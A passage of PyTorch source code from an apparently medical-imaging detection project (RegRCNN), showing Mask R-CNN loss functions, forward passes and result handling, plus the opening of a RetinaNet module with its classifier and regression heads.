negative_count = np.max((1, pos_indices.cpu().data.numpy().size))
roi_probs_neg = F.softmax(roi_logits_neg, dim=1)
neg_ix = mutils.shem(roi_probs_neg, negative_count, shem_poolsize)
neg_loss = F.cross_entropy(roi_logits_neg[neg_ix], torch.LongTensor([0] * neg_ix.shape[0]).cuda())
np_neg_ix = neg_ix.cpu().data.numpy()
#print("pos, neg count", pos_indices.cpu().data.numpy().size, negative_count)
else:
neg_loss = torch.FloatTensor([0]).cuda()
np_neg_ix = np.array([]).astype('int32')
loss = (pos_loss + neg_loss) / 2
return loss, np_neg_ix
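# Illustration: a minimal CPU-only sketch of the hard-negative idea behind mutils.shem above.
# shem samples stochastically from a top-k pool of high-scoring negatives; this sketch shows the
# plain top-k ("hardest negatives") selection such a pool is built from. Values are hypothetical.
def _demo_hard_negative_selection(negative_count=2):
    # fg-probabilities of some negative anchors; confident false positives (high fg prob) are "hard"
    neg_fg_probs = torch.tensor([0.02, 0.80, 0.10, 0.65, 0.05])
    hard_ix = torch.topk(neg_fg_probs, k=negative_count).indices  # -> tensor([1, 3])
    return hard_ix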
def compute_rpn_bbox_loss(rpn_pred_deltas, rpn_target_deltas, rpn_match):
"""
:param rpn_target_deltas: (b, n_positive_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd)))).
Uses 0 padding to fill in unused bbox deltas.
:param rpn_pred_deltas: predicted deltas from RPN. (b, n_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param rpn_match: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:return: loss: torch 1D tensor.
"""
if not 0 in torch.nonzero(rpn_match == 1).size():
indices = torch.nonzero(rpn_match == 1).squeeze(1)
# Pick bbox deltas that contribute to the loss
rpn_pred_deltas = rpn_pred_deltas[indices]
# Trim target bounding box deltas to the same length as rpn_bbox.
target_deltas = rpn_target_deltas[:rpn_pred_deltas.size()[0], :]
# Smooth L1 loss
loss = F.smooth_l1_loss(rpn_pred_deltas, target_deltas)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_mrcnn_bbox_loss(mrcnn_pred_deltas, mrcnn_target_deltas, target_class_ids):
"""
:param mrcnn_target_deltas: (n_sampled_rois, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param mrcnn_pred_deltas: (n_sampled_rois, n_classes, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param target_class_ids: (n_sampled_rois)
:return: loss: torch 1D tensor.
"""
if not 0 in torch.nonzero(target_class_ids > 0).size():
positive_roi_ix = torch.nonzero(target_class_ids > 0)[:, 0]
positive_roi_class_ids = target_class_ids[positive_roi_ix].long()
target_bbox = mrcnn_target_deltas[positive_roi_ix, :].detach()
pred_bbox = mrcnn_pred_deltas[positive_roi_ix, positive_roi_class_ids, :]
loss = F.smooth_l1_loss(pred_bbox, target_bbox)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_mrcnn_mask_loss(pred_masks, target_masks, target_class_ids):
"""
:param target_masks: (n_sampled_rois, y, x, (z)) A float32 tensor of values 0 or 1. Uses zero padding to fill array.
:param pred_masks: (n_sampled_rois, n_classes, y, x, (z)) float32 tensor with values between [0, 1].
:param target_class_ids: (n_sampled_rois)
:return: loss: torch 1D tensor.
"""
#print("targ masks", target_masks.unique(return_counts=True))
if not 0 in torch.nonzero(target_class_ids > 0).size():
# Only positive ROIs contribute to the loss. And only
# the class-specific mask of each ROI.
positive_ix = torch.nonzero(target_class_ids > 0)[:, 0]
positive_class_ids = target_class_ids[positive_ix].long()
y_true = target_masks[positive_ix, :, :].detach()
y_pred = pred_masks[positive_ix, positive_class_ids, :, :]
loss = F.binary_cross_entropy(y_pred, y_true)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_mrcnn_class_loss(tasks, pred_class_logits, target_class_ids):
"""
:param pred_class_logits: (n_sampled_rois, n_classes)
:param target_class_ids: (n_sampled_rois) batch dimension was merged into roi dimension.
:return: loss: torch 1D tensor.
"""
if 'class' in tasks and not 0 in target_class_ids.size():
loss = F.cross_entropy(pred_class_logits, target_class_ids.long())
else:
loss = torch.FloatTensor([0.]).cuda()
return loss
def compute_mrcnn_regression_loss(tasks, pred, target, target_class_ids):
"""regression loss is a distance metric between target vector and predicted regression vector.
:param pred: (n_sampled_rois, n_classes, n_rg_feats) for real regression, or (n_sampled_rois, n_classes, n_rg_bins) for the rg_bin task.
:param target: (n_sampled_rois, n_rg_feats) regression targets, or (n_sampled_rois,) bin ids for the rg_bin task.
:return: differentiable loss, torch 1D tensor on cuda
"""
if not 0 in target.shape and not 0 in torch.nonzero(target_class_ids > 0).shape:
positive_roi_ix = torch.nonzero(target_class_ids > 0)[:, 0]
positive_roi_class_ids = target_class_ids[positive_roi_ix].long()
target = target[positive_roi_ix].detach()
pred = pred[positive_roi_ix, positive_roi_class_ids]
if "regression_bin" in tasks:
loss = F.cross_entropy(pred, target.long())
else:
loss = F.smooth_l1_loss(pred, target)
#loss = F.mse_loss(pred, target)
else:
loss = torch.FloatTensor([0.]).cuda()
return loss
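# Illustration: a minimal CPU-only sketch of the smooth-L1 distance used above, compared to MSE.
# Values are hypothetical; the gathering of positive rois is omitted for brevity.
def _demo_smooth_l1_vs_mse():
    pred = torch.tensor([[0.10, -0.20, 0.05], [2.50, 0.00, -1.00]])
    target = torch.tensor([[0.00, 0.00, 0.00], [0.40, 0.10, -0.90]])
    robust = F.smooth_l1_loss(pred, target)  # large residuals enter linearly (robust to outliers)
    quadratic = F.mse_loss(pred, target)     # large residuals enter quadratically
    return robust, quadratic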
############################################################
# Detection Layer
############################################################
def compute_roi_scores(tasks, batch_rpn_proposals, mrcnn_cl_logits):
""" Depending on the predicition tasks: if no class prediction beyong fg/bg (--> means no additional class
head was applied) use RPN objectness scores as roi scores, otherwise class head scores.
:param cf:
:param batch_rpn_proposals:
:param mrcnn_cl_logits:
:return:
"""
if not 'class' in tasks:
scores = batch_rpn_proposals[:, :, -1].view(-1, 1)
scores = torch.cat((1 - scores, scores), dim=1)
else:
scores = F.softmax(mrcnn_cl_logits, dim=1)
return scores
############################################################
# MaskRCNN Class
############################################################
class net(nn.Module):
def __init__(self, cf, logger):
super(net, self).__init__()
self.cf = cf
self.logger = logger
self.build()
loss_order = ['rpn_class', 'rpn_bbox', 'mrcnn_bbox', 'mrcnn_mask', 'mrcnn_class', 'mrcnn_rg']
if hasattr(cf, "mrcnn_loss_weights"):
# bring into right order
self.loss_weights = np.array([cf.mrcnn_loss_weights[k] for k in loss_order])
else:
self.loss_weights = np.array([1.]*len(loss_order))
if self.cf.weight_init=="custom":
logger.info("Tried to use custom weight init which is not defined. Using pytorch default.")
elif self.cf.weight_init:
mutils.initialize_weights(self)
else:
logger.info("using default pytorch weight init")
def build(self):
"""Build Mask R-CNN architecture."""
# Image size must be divisible by 2 multiple times.
h, w = self.cf.patch_size[:2]
if h / 2**5 != int(h / 2**5) or w / 2**5 != int(w / 2**5):
raise Exception("Image size must be divisible by 2 at least 5 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 288, 320, 384, 448, 512, ... etc.,i.e.,"
"any number x*32 will do!")
# instantiate abstract multi-dimensional conv generator and load backbone module.
backbone = utils.import_module('bbone', self.cf.backbone_path)
self.logger.info("loaded backbone from {}".format(self.cf.backbone_path))
conv = backbone.ConvGenerator(self.cf.dim)
# build Anchors, FPN, RPN, Classifier / Bbox-Regressor -head, Mask-head
self.np_anchors = mutils.generate_pyramid_anchors(self.logger, self.cf)
self.anchors = torch.from_numpy(self.np_anchors).float().cuda()
self.fpn = backbone.FPN(self.cf, conv, relu_enc=self.cf.relu, operate_stride1=False).cuda()
self.rpn = RPN(self.cf, conv)
self.classifier = Classifier(self.cf, conv)
self.mask = Mask(self.cf, conv)
def forward(self, img, is_training=True):
"""
:param img: input images (b, c, y, x, (z)).
:return: rpn_pred_logits: (b, n_anchors, 2)
:return: rpn_pred_deltas: (b, n_anchors, (y, x, (z), log(h), log(w), (log(d))))
:return: batch_proposal_boxes: (b, n_proposals, (y1, x1, y2, x2, (z1), (z2), batch_ix)) only for monitoring/plotting.
:return: detections: (n_final_detections, (y1, x1, y2, x2, (z1), (z2), batch_ix, pred_class_id, pred_score)
:return: detection_masks: (n_final_detections, n_classes, y, x, (z)) raw molded masks as returned by mask-head.
"""
# extract features.
fpn_outs = self.fpn(img)
rpn_feature_maps = [fpn_outs[i] for i in self.cf.pyramid_levels]
self.mrcnn_feature_maps = rpn_feature_maps
# loop through pyramid layers and apply RPN.
layer_outputs = [ self.rpn(p_feats) for p_feats in rpn_feature_maps ]
# concatenate layer outputs.
# convert from list of lists of level outputs to list of lists of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
outputs = list(zip(*layer_outputs))
outputs = [torch.cat(list(o), dim=1) for o in outputs]
rpn_pred_logits, rpn_pred_probs, rpn_pred_deltas = outputs
# generate proposals: apply predicted deltas to anchors and filter by foreground scores from RPN classifier.
proposal_count = self.cf.post_nms_rois_training if is_training else self.cf.post_nms_rois_inference
batch_normed_props, batch_unnormed_props = mutils.refine_proposals(rpn_pred_probs, rpn_pred_deltas,
proposal_count, self.anchors, self.cf)
# merge batch dimension of proposals while storing allocation info in coordinate dimension.
batch_ixs = torch.arange(
batch_normed_props.shape[0]).cuda().unsqueeze(1).repeat(1,batch_normed_props.shape[1]).view(-1).float()
rpn_rois = batch_normed_props[:, :, :-1].view(-1, batch_normed_props[:, :, :-1].shape[2])
self.rpn_rois_batch_info = torch.cat((rpn_rois, batch_ixs.unsqueeze(1)), dim=1)
# this is the first of two forward passes in the second stage, where no activations are stored for backprop.
# here, all proposals are forwarded (with virtual_batch_size = batch_size * post_nms_rois.)
# for inference/monitoring as well as sampling of rois for the loss functions.
# processed in chunks of roi_chunk_size to re-adjust to gpu-memory.
chunked_rpn_rois = self.rpn_rois_batch_info.split(self.cf.roi_chunk_size)
bboxes_list, class_logits_list, regressions_list = [], [], []
with torch.no_grad():
for chunk in chunked_rpn_rois:
chunk_bboxes, chunk_class_logits, chunk_regressions = self.classifier(self.mrcnn_feature_maps, chunk)
bboxes_list.append(chunk_bboxes)
class_logits_list.append(chunk_class_logits)
regressions_list.append(chunk_regressions)
mrcnn_bbox = torch.cat(bboxes_list, 0)
mrcnn_class_logits = torch.cat(class_logits_list, 0)
mrcnn_regressions = torch.cat(regressions_list, 0)
self.mrcnn_roi_scores = compute_roi_scores(self.cf.prediction_tasks, batch_normed_props, mrcnn_class_logits)
# refine classified proposals, filter and return final detections.
# returns (cf.max_inst_per_batch_element, n_coords+1+...)
detections = mutils.refine_detections(self.cf, batch_ixs, rpn_rois, mrcnn_bbox, self.mrcnn_roi_scores,
mrcnn_regressions)
# forward remaining detections through mask-head to generate corresponding masks.
scale = [img.shape[2]] * 4 + [img.shape[-1]] * 2
scale = torch.from_numpy(np.array(scale[:self.cf.dim * 2] + [1])[None]).float().cuda()
# first self.cf.dim * 2 entries on axis 1 are always the box coords, +1 is batch_ix
detection_boxes = detections[:, :self.cf.dim * 2 + 1] / scale
with torch.no_grad():
detection_masks = self.mask(self.mrcnn_feature_maps, detection_boxes)
return [rpn_pred_logits, rpn_pred_deltas, batch_unnormed_props, detections, detection_masks]
def loss_samples_forward(self, batch_gt_boxes, batch_gt_masks, batch_gt_class_ids, batch_gt_regressions=None):
"""
this is the second forward pass through the second stage (features from stage one are re-used).
samples few rois in loss_example_mining and forwards only those for loss computation.
:param batch_gt_class_ids: list over batch elements. Each element is a list over the corresponding roi target labels.
:param batch_gt_boxes: list over batch elements. Each element is a list over the corresponding roi target coordinates.
:param batch_gt_masks: (b, n(b), c, y, x (,z)) list over batch elements. Each element holds n_gt_rois(b)
(i.e., dependent on the batch element) binary masks of shape (c, y, x, (z)).
:return: sample_logits: (n_sampled_rois, n_classes) predicted class scores.
:return: sample_deltas: (n_sampled_rois, n_classes, 2 * dim) predicted corrections to be applied to proposals for refinement.
:return: sample_mask: (n_sampled_rois, n_classes, y, x, (z)) predicted masks per class and proposal.
:return: sample_target_class_ids: (n_sampled_rois) target class labels of sampled proposals.
:return: sample_target_deltas: (n_sampled_rois, 2 * dim) target deltas of sampled proposals for box refinement.
:return: sample_target_masks: (n_sampled_rois, y, x, (z)) target masks of sampled proposals.
:return: sample_proposals: (n_sampled_rois, 2 * dim) RPN output for sampled proposals. only for monitoring/plotting.
"""
# sample rois for loss and get corresponding targets for all Mask R-CNN head network losses.
sample_ics, sample_target_deltas, sample_target_mask, sample_target_class_ids, sample_target_regressions = \
mutils.loss_example_mining(self.cf, self.rpn_rois_batch_info, batch_gt_boxes, batch_gt_masks,
self.mrcnn_roi_scores, batch_gt_class_ids, batch_gt_regressions)
# re-use feature maps and RPN output from first forward pass.
sample_proposals = self.rpn_rois_batch_info[sample_ics]
if not 0 in sample_proposals.size():
sample_deltas, sample_logits, sample_regressions = self.classifier(self.mrcnn_feature_maps, sample_proposals)
sample_mask = self.mask(self.mrcnn_feature_maps, sample_proposals)
else:
sample_logits = torch.FloatTensor().cuda()
sample_deltas = torch.FloatTensor().cuda()
sample_regressions = torch.FloatTensor().cuda()
sample_mask = torch.FloatTensor().cuda()
return [sample_deltas, sample_mask, sample_logits, sample_regressions, sample_proposals,
sample_target_deltas, sample_target_mask, sample_target_class_ids, sample_target_regressions]
def get_results(self, img_shape, detections, detection_masks, box_results_list=None, return_masks=True):
"""
Restores batch dimension of merged detections, unmolds detections, creates and fills results dict.
:param img_shape:
:param detections: shape (n_final_detections, len(info)), where
info=( y1, x1, y2, x2, (z1,z2), batch_ix, pred_class_id, pred_score )
:param detection_masks: (n_final_detections, n_classes, y, x, (z)) raw molded masks as returned by mask-head.
:param box_results_list: None or list of output boxes for monitoring/plotting.
each element is a list of boxes per batch element.
:param return_masks: boolean. If True, full resolution masks are returned for all proposals (speed trade-off).
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, 1] only fg. vs. bg for now.
class-specific return of masks will come with implementation of instance segmentation evaluation.
"""
detections = detections.cpu().data.numpy()
if self.cf.dim == 2:
detection_masks = detection_masks.permute(0, 2, 3, 1).cpu().data.numpy()
else:
detection_masks = detection_masks.permute(0, 2, 3, 4, 1).cpu().data.numpy()
# det masks shape now (n_dets, y,x(,z), n_classes)
# restore batch dimension of merged detections using the batch_ix info.
batch_ixs = detections[:, self.cf.dim*2]
detections = [detections[batch_ixs == ix] for ix in range(img_shape[0])]
mrcnn_mask = [detection_masks[batch_ixs == ix] for ix in range(img_shape[0])]
# mrcnn_mask: shape (b_size, variable, variable, n_classes); "variable" because it depends on the single-instance mask size
if box_results_list is None: # for test_forward, where no previous list exists.
box_results_list = [[] for _ in range(img_shape[0])]
# seg_logits == seg_probs in mrcnn since mask head finishes with sigmoid (--> image space = [0,1])
seg_probs = []
# loop over batch and unmold detections.
for ix in range(img_shape[0]):
# final masks are one-hot encoded (b, n_classes, y, x, (z))
final_masks = np.zeros((self.cf.num_classes + 1, *img_shape[2:]))
# +1 for bg; 0.5 because the mask head only classifies bg/fg with outputs between 0 and 1 --> bg is < 0.5
if self.cf.num_classes + 1 != self.cf.num_seg_classes:
self.logger.warning("n of roi-classifier head classes {} doesnt match cf.num_seg_classes {}".format(
self.cf.num_classes + 1, self.cf.num_seg_classes))
if not 0 in detections[ix].shape:
boxes = detections[ix][:, :self.cf.dim*2].astype(np.int32)
class_ids = detections[ix][:, self.cf.dim*2 + 1].astype(np.int32)
scores = detections[ix][:, self.cf.dim*2 + 2]
masks = mrcnn_mask[ix][np.arange(boxes.shape[0]), ..., class_ids]
regressions = detections[ix][:,self.cf.dim*2+3:]
# Filter out detections with zero area. Often only happens in early
# stages of training when the network weights are still a bit random.
if self.cf.dim == 2:
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
else:
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 5] - boxes[:, 4]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
regressions = np.delete(regressions, exclude_ix, axis=0)
# Resize masks to original image size and set boundary threshold.
if return_masks:
for i in range(masks.shape[0]): #masks per this batch instance/element/image
# Convert neural network mask to full size mask
if self.cf.dim == 2:
full_mask = mutils.unmold_mask_2D(masks[i], boxes[i], img_shape[2:])
else:
full_mask = mutils.unmold_mask_3D(masks[i], boxes[i], img_shape[2:])
# take the maximum seg_logits per class of instances in that class, i.e., a pixel in a class
# has the max seg_logit value over all instances of that class in one sample
final_masks[class_ids[i]] = np.max((final_masks[class_ids[i]], full_mask), axis=0)
final_masks[0] = np.full(final_masks[0].shape, 0.49999999) #effectively min_det_thres at 0.5 per pixel
# add final predictions to results.
if not 0 in boxes.shape:
for ix2, coords in enumerate(boxes):
box = {'box_coords': coords, 'box_type': 'det', 'box_score': scores[ix2],
'box_pred_class_id': class_ids[ix2]}
#if (hasattr(self.cf, "convert_cl_to_rg") and self.cf.convert_cl_to_rg):
if "regression_bin" in self.cf.prediction_tasks:
# in this case, regression preds are actually the rg_bin_ids --> map to rg value the bin represents
box['rg_bin'] = regressions[ix2].argmax()
box['regression'] = self.cf.bin_id2rg_val[box['rg_bin']]
else:
box['regression'] = regressions[ix2]
if hasattr(self.cf, "rg_val_to_bin_id") and \
any(['regression' in task for task in self.cf.prediction_tasks]):
box.update({'rg_bin': self.cf.rg_val_to_bin_id(regressions[ix2])})
box_results_list[ix].append(box)
# if no detections were made--> keep full bg mask (zeros).
seg_probs.append(final_masks)
# create and fill results dictionary.
results_dict = {}
results_dict['boxes'] = box_results_list
results_dict['seg_preds'] = np.array(seg_probs)
return results_dict
def train_forward(self, batch, is_validation=False):
"""
train method (also used for validation monitoring). wrapper around forward pass of network. prepares input data
for processing, computes losses, and stores outputs in a dictionary.
:param batch: dictionary containing 'data', 'seg', etc.
batch['roi_masks']: (b, n(b), c, h(n), w(n) (z(n))) list like roi_labels but with arrays (masks) in place of
integers. c==channels of the raw segmentation.
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes].
'torch_loss': 1D torch tensor for backprop.
'class_loss': classification loss for monitoring.
"""
img = batch['data']
gt_boxes = batch['bb_target']
#axes = (0, 2, 3, 1) if self.cf.dim == 2 else (0, 2, 3, 4, 1)
#gt_masks = [np.transpose(batch['roi_masks'][ii], axes=axes) for ii in range(len(batch['roi_masks']))]
gt_masks = batch['roi_masks']
gt_class_ids = batch['class_targets']
if 'regression' in self.cf.prediction_tasks:
gt_regressions = batch["regression_targets"]
elif 'regression_bin' in self.cf.prediction_tasks:
gt_regressions = batch["rg_bin_targets"]
else:
gt_regressions = None
img = torch.from_numpy(img).cuda().float()
batch_rpn_class_loss = torch.FloatTensor([0]).cuda()
batch_rpn_bbox_loss = torch.FloatTensor([0]).cuda()
# list of output boxes for monitoring/plotting. each element is a list of boxes per batch element.
box_results_list = [[] for _ in range(img.shape[0])]
#forward passes. 1. general forward pass, where no activations are saved in second stage (for performance
# monitoring and loss sampling). 2. second stage forward pass of sampled rois with stored activations for backprop.
rpn_class_logits, rpn_pred_deltas, proposal_boxes, detections, detection_masks = self.forward(img)
mrcnn_pred_deltas, mrcnn_pred_mask, mrcnn_class_logits, mrcnn_regressions, sample_proposals, \
mrcnn_target_deltas, target_mask, target_class_ids, target_regressions = \
self.loss_samples_forward(gt_boxes, gt_masks, gt_class_ids, gt_regressions)
# loop over batch
for b in range(img.shape[0]):
if len(gt_boxes[b]) > 0:
# add gt boxes to output list
for tix in range(len(gt_boxes[b])):
gt_box = {'box_type': 'gt', 'box_coords': batch['bb_target'][b][tix]}
for name in self.cf.roi_items:
gt_box.update({name: batch[name][b][tix]})
box_results_list[b].append(gt_box)
# match gt boxes with anchors to generate targets for RPN losses.
rpn_match, rpn_target_deltas = mutils.gt_anchor_matching(self.cf, self.np_anchors, gt_boxes[b])
# add positive anchors used for loss to output list for monitoring.
pos_anchors = mutils.clip_boxes_numpy(self.np_anchors[np.argwhere(rpn_match == 1)][:, 0], img.shape[2:])
for p in pos_anchors:
box_results_list[b].append({'box_coords': p, 'box_type': 'pos_anchor'})
else:
rpn_match = np.array([-1]*self.np_anchors.shape[0])
rpn_target_deltas = np.array([0])
rpn_match_gpu = torch.from_numpy(rpn_match).cuda()
rpn_target_deltas = torch.from_numpy(rpn_target_deltas).float().cuda()
# compute RPN losses.
rpn_class_loss, neg_anchor_ix = compute_rpn_class_loss(rpn_class_logits[b], rpn_match_gpu, self.cf.shem_poolsize)
rpn_bbox_loss = compute_rpn_bbox_loss(rpn_pred_deltas[b], rpn_target_deltas, rpn_match_gpu)
batch_rpn_class_loss += rpn_class_loss /img.shape[0]
batch_rpn_bbox_loss += rpn_bbox_loss /img.shape[0]
# add negative anchors used for loss to output list for monitoring.
# neg_anchor_ix = neg_ix come from shem and mark positions in roi_probs_neg = rpn_class_logits[neg_indices]
# with neg_indices = rpn_match == -1
neg_anchors = mutils.clip_boxes_numpy(self.np_anchors[rpn_match == -1][neg_anchor_ix], img.shape[2:])
for n in neg_anchors:
box_results_list[b].append({'box_coords': n, 'box_type': 'neg_anchor'})
# add highest scoring proposals to output list for monitoring.
rpn_proposals = proposal_boxes[b][proposal_boxes[b, :, -1].argsort()][::-1]
for r in rpn_proposals[:self.cf.n_plot_rpn_props, :-1]:
box_results_list[b].append({'box_coords': r, 'box_type': 'prop'})
# add positive and negative roi samples used for mrcnn losses to output list for monitoring.
if not 0 in sample_proposals.shape:
rois = mutils.clip_to_window(self.cf.window, sample_proposals).cpu().data.numpy()
for ix, r in enumerate(rois):
box_results_list[int(r[-1])].append({'box_coords': r[:-1] * self.cf.scale,
'box_type': 'pos_class' if target_class_ids[ix] > 0 else 'neg_class'})
# compute mrcnn losses.
mrcnn_class_loss = compute_mrcnn_class_loss(self.cf.prediction_tasks, mrcnn_class_logits, target_class_ids)
mrcnn_bbox_loss = compute_mrcnn_bbox_loss(mrcnn_pred_deltas, mrcnn_target_deltas, target_class_ids)
mrcnn_regressions_loss = compute_mrcnn_regression_loss(self.cf.prediction_tasks, mrcnn_regressions, target_regressions, target_class_ids)
# mrcnn can be run without pixelwise annotations available (Faster R-CNN mode).
# In this case, the mask_loss is taken out of training.
if self.cf.frcnn_mode:
mrcnn_mask_loss = torch.FloatTensor([0]).cuda()
else:
mrcnn_mask_loss = compute_mrcnn_mask_loss(mrcnn_pred_mask, target_mask, target_class_ids)
loss = batch_rpn_class_loss + batch_rpn_bbox_loss +\
mrcnn_bbox_loss + mrcnn_mask_loss + mrcnn_class_loss + mrcnn_regressions_loss
# run unmolding of predictions for monitoring and merge all results to one dictionary.
return_masks = self.cf.return_masks_in_val if is_validation else self.cf.return_masks_in_train
results_dict = self.get_results(img.shape, detections, detection_masks, box_results_list,
return_masks=return_masks)
#results_dict['seg_preds'] = results_dict['seg_preds'].argmax(axis=1).astype('uint8')[:,np.newaxis]
if 'dice' in self.cf.metrics:
results_dict['batch_dices'] = mutils.dice_per_batch_and_class(
results_dict['seg_preds'], batch["seg"], self.cf.num_seg_classes, convert_to_ohe=True)
results_dict['torch_loss'] = loss
results_dict['class_loss'] = mrcnn_class_loss.item()
results_dict['bbox_loss'] = mrcnn_bbox_loss.item()
results_dict['mask_loss'] = mrcnn_mask_loss.item()
results_dict['rg_loss'] = mrcnn_regressions_loss.item()
results_dict['rpn_class_loss'] = rpn_class_loss.item()
results_dict['rpn_bbox_loss'] = rpn_bbox_loss.item()
return results_dict
def test_forward(self, batch, return_masks=True):
"""
test method. wrapper around forward pass of network without usage of any ground truth information.
prepares input data for processing and stores outputs in a dictionary.
:param batch: dictionary containing 'data'
:param return_masks: boolean. If True, full resolution masks are returned for all proposals (speed trade-off).
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes]
"""
img = batch['data']
img = torch.from_numpy(img).float().cuda()
_, _, _, detections, detection_masks = self.forward(img)
results_dict = self.get_results(img.shape, detections, detection_masks, return_masks=return_masks)
return results_dict
```
#### File: RegRCNN/models/retina_net.py
```python
import utils.model_utils as mutils
import utils.exp_utils as utils
import sys
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils
sys.path.append('..')
from custom_extensions.nms import nms
class Classifier(nn.Module):
def __init__(self, cf, conv):
"""
Builds the classifier sub-network.
"""
super(Classifier, self).__init__()
self.dim = conv.dim
self.n_classes = cf.head_classes
n_input_channels = cf.end_filts
n_features = cf.n_rpn_features
n_output_channels = cf.n_anchors_per_pos * cf.head_classes
anchor_stride = cf.rpn_anchor_stride
self.conv_1 = conv(n_input_channels, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_2 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_3 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_4 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_final = conv(n_features, n_output_channels, ks=3, stride=anchor_stride, pad=1, relu=None)
def forward(self, x):
"""
:param x: input feature map (b, in_c, y, x, (z))
:return: class_logits (b, n_anchors, n_classes)
"""
x = self.conv_1(x)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
class_logits = self.conv_final(x)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
class_logits = class_logits.permute(*axes)
class_logits = class_logits.contiguous()
class_logits = class_logits.view(x.shape[0], -1, self.n_classes)
return [class_logits]
class BBRegressor(nn.Module):
def __init__(self, cf, conv):
"""
Builds the bb-regression sub-network.
"""
super(BBRegressor, self).__init__()
self.dim = conv.dim
n_input_channels = cf.end_filts
n_features = cf.n_rpn_features
n_output_channels = cf.n_anchors_per_pos * self.dim * 2
anchor_stride = cf.rpn_anchor_stride
self.conv_1 = conv(n_input_channels, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_2 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_3 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_4 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_final = conv(n_features, n_output_channels, ks=3, stride=anchor_stride, pad=1, relu=None)
def forward(self, x):
"""
:param x: input feature map (b, in_c, y, x, (z))
:return: bb_logits (b, n_anchors, dim * 2)
"""
x = self.conv_1(x)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
bb_logits = self.conv_final(x)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
bb_logits = bb_logits.permute(*axes)
bb_logits = bb_logits.contiguous()
bb_logits = bb_logits.view(x.shape[0], -1, self.dim * 2)
return [bb_logits]
class RoIRegressor(nn.Module):
def __init__(self, cf, conv, rg_feats):
"""
Builds the RoI-item-regression sub-network. Regression items can be, e.g., malignancy scores of tumors.
"""
super(RoIRegressor, self).__init__()
self.dim = conv.dim
n_input_channels = cf.end_filts
n_features = cf.n_rpn_features
self.rg_feats = rg_feats
n_output_channels = cf.n_anchors_per_pos * self.rg_feats
anchor_stride = cf.rpn_anchor_stride
self.conv_1 = conv(n_input_channels, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_2 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_3 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_4 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_final = conv(n_features, n_output_channels, ks=3, stride=anchor_stride,
pad=1, relu=None)
def forward(self, x):
"""
:param x: input feature map (b, in_c, y, x, (z))
:return: rg_feats (b, n_anchors, n_rg_feats)
"""
x = self.conv_1(x)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
x = self.conv_final(x)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
x = x.permute(*axes)
x = x.contiguous()
x = x.view(x.shape[0], -1, self.rg_feats)
return [x]
############################################################
# Loss Functions
############################################################
#
def compute_class_loss(anchor_matches, class_pred_logits, shem_poolsize=20):
"""
:param anchor_matches: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:param class_pred_logits: (n_anchors, n_classes). logits from classifier sub-network.
:param shem_poolsize: int. factor of top-k candidates to draw from per negative sample (online-hard-example-mining).
:return: loss: torch tensor
:return: np_neg_ix: 1D array containing indices of the neg_roi_logits, which have been sampled for training.
"""
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
pos_indices = torch.nonzero(anchor_matches > 0)
neg_indices = torch.nonzero(anchor_matches == -1)
